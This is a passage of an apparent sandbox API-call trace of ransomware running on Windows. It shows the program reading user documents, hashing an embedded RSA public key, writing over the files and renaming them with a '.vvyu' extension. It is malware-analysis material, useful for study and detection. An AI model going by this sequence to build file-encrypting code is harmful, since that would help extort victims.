hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d30 | out: hHeap=0x6a0000) returned 1 [0192.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0192.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0192.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0192.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea810 | out: hHeap=0x6a0000) returned 1 [0192.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0192.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0192.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0192.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0192.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0192.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d60 | out: hHeap=0x6a0000) returned 1 [0192.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39da8 | out: hHeap=0x6a0000) returned 1 [0192.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0192.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d48 | out: hHeap=0x6a0000) returned 1 [0192.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d18 | out: hHeap=0x6a0000) returned 1 [0192.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0192.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0192.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0192.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d00 | out: hHeap=0x6a0000) returned 1 [0192.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b18 | out: hHeap=0x6a0000) returned 1 [0192.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0192.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0192.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0192.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0192.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0192.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0192.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0192.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0192.425] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0xe28b, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0xe28b, lpOverlapped=0x0) returned 1 [0192.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.426] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xe290, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.426] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0192.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0192.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0192.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0192.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0192.427] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0192.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.428] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.428] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0192.428] CloseHandle (hObject=0x584) returned 1 [0192.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x711c18 [0192.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8b0) returned 0x2d45778 [0192.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x711c18 | out: hHeap=0x6a0000) returned 1 [0192.439] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\rQz y4W0rYbhQ_iRzD3\\JS80beEINGqUQ8qtRx7a.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\rqz y4w0rybhq_irzd3\\js80beeingquq8qtrx7a.xls"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\rQz y4W0rYbhQ_iRzD3\\JS80beEINGqUQ8qtRx7a.xls.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\rqz y4w0rybhq_irzd3\\js80beeingquq8qtrx7a.xls.vvyu")) returned 1 [0192.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.440] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0192.443] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f2109d0, ftCreationTime.dwHighDateTime=0x1d89701, ftLastAccessTime.dwLowDateTime=0x2021b530, ftLastAccessTime.dwHighDateTime=0x1d89d89, ftLastWriteTime.dwLowDateTime=0x2021b530, ftLastWriteTime.dwHighDateTime=0x1d89d89, nFileSizeHigh=0x0, nFileSizeLow=0x5a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y2190b-f euB_6uwcnlw.ods", cAlternateFileName="Y2190B~1.ODS")) returned 1 [0192.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d920 [0192.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.443] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\rQz y4W0rYbhQ_iRzD3\\y2190b-f euB_6uwcnlw.ods") returned=".ods" [0192.443] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\rQz y4W0rYbhQ_iRzD3\\y2190b-f euB_6uwcnlw.ods" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\rqz y4w0rybhq_irzd3\\y2190b-f eub_6uwcnlw.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.444] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=1448) returned 1 [0192.444] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0192.446] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x582, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.447] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0192.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.448] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.449] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x5a8, lpOverlapped=0x0) returned 1 [0192.449] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0192.449] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.449] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.449] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea810) returned 1 [0192.450] CryptCreateHash (in: hProv=0x6ea810, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0192.450] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.450] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0192.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0192.450] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0192.450] GetLastError () returned 0x0 [0192.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0192.450] GetLastError () returned 0x0 [0192.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0192.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.451] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0192.451] CryptReleaseContext (hProv=0x6ea810, dwFlags=0x0) returned 1 [0192.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0192.451] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0192.451] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0192.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0192.451] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0192.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5b0) returned 0x2d42908 [0192.452] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0192.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0192.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0192.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0192.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0192.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41b18 [0192.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d00 [0192.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41b60 [0192.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d18 [0192.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d48 [0192.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39da8 [0192.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d60 [0192.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0192.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0192.453] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0192.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d45778 [0192.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d48 | out: hHeap=0x6a0000) returned 1 [0192.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d60 | out: hHeap=0x6a0000) returned 1 [0192.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39da8 | out: hHeap=0x6a0000) returned 1 [0192.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0192.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39da8 [0192.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0192.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d60 [0192.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0192.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39d48 [0192.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0192.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0192.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0192.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0192.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0192.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0192.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0192.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0192.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d60 | out: hHeap=0x6a0000) returned 1 [0192.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d48 | out: hHeap=0x6a0000) returned 1 [0192.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39da8 | out: hHeap=0x6a0000) returned 1 [0192.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0192.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0192.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0192.456] GetCurrentThreadId () returned 0x264 [0192.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0192.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d45200 [0192.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0192.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea810 [0192.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0192.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0192.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0192.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0192.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.457] GetCurrentThreadId () returned 0x264 [0192.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0192.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0192.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0192.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0192.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0192.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39da8 [0192.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0192.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0192.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0192.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0192.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0192.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0192.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d48 [0192.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0192.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0192.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0192.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0192.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d60 [0192.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0192.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0192.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0192.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d30 [0192.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0192.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39dc0 [0192.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 